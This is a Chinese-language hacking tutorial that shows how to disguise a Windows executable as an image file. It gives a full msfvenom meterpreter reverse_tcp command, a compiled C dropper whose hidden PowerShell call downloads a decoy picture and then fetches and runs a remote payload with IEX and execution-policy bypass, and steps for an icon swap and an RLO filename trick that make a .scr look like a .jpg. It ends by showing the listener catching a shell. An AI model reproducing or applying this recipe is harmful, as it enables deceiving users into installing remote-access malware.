1. 程式人生 > >【奇淫技巧】圖片偽裝大法--偽裝可執行文

【奇淫技巧】圖片偽裝大法--偽裝可執行文

style sys alt user var main image 可執行文件 打開

能夠將可執行文件偽裝成圖片

用到的工具: kali 2.0、msfasploit、Resource Hacker

首先利用msfvenom生成一個powershell的ps1文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.149.129 lport=2234 -f psh-reflection>/var/www/html/payload.ps1

技術分享

隨後開啟apache服務

service apache2 start

然後找兩張png和ico一模一樣的圖片

一樣放到apache目錄下

技術分享

接下來在windows系統上編譯如下代碼

#include <stdio.h>
#include <windows.h>
int main()
{
system("powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(‘http://192.168.149.129/shot.png‘, ‘C:\\Users\\Public\\shot.png‘) & start C:\\Users\\Public\\shot.png & powershell.exe -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.149.129/payload.ps1‘);test.ps1\"
"); return 0; }

這串代碼會遠程下載shot.png,並保持在本地。然後馬上打開它!!

這時候,把編譯好的惡意程序的圖標改成shot.png一樣的圖片就可以偽裝成一張圖了。這時候你打開不僅僅會打開本地下載好的圖片,而且還會執行我們的payload.ps1

下面就說如何更改圖標

下載一個Resource Hacker

技術分享

open一個可執行文件--》Add Binary--》添加完圖標後保存

然後就在桌面上出現一個demon.exe

技術分享

這時候還沒完,我們把他改成“gpj.scr”格式

不用擔心改成scr格式文件就無法運行了

接下來我們利用系統專有的從右至左 (Right-to-Left) 的字符重寫 (RLO)控制字符來達到迷惑的效果

技術分享

先改成gpj.scr 然後吧光標放在gpj的前面,再右鍵改字符

我們來試試效果:

配置好msf反彈

技術分享

可以看到,運行rcs.jpg之後,直接打開了圖片並且msf彈回了shell。

【奇淫技巧】圖片偽裝大法--偽裝可執行文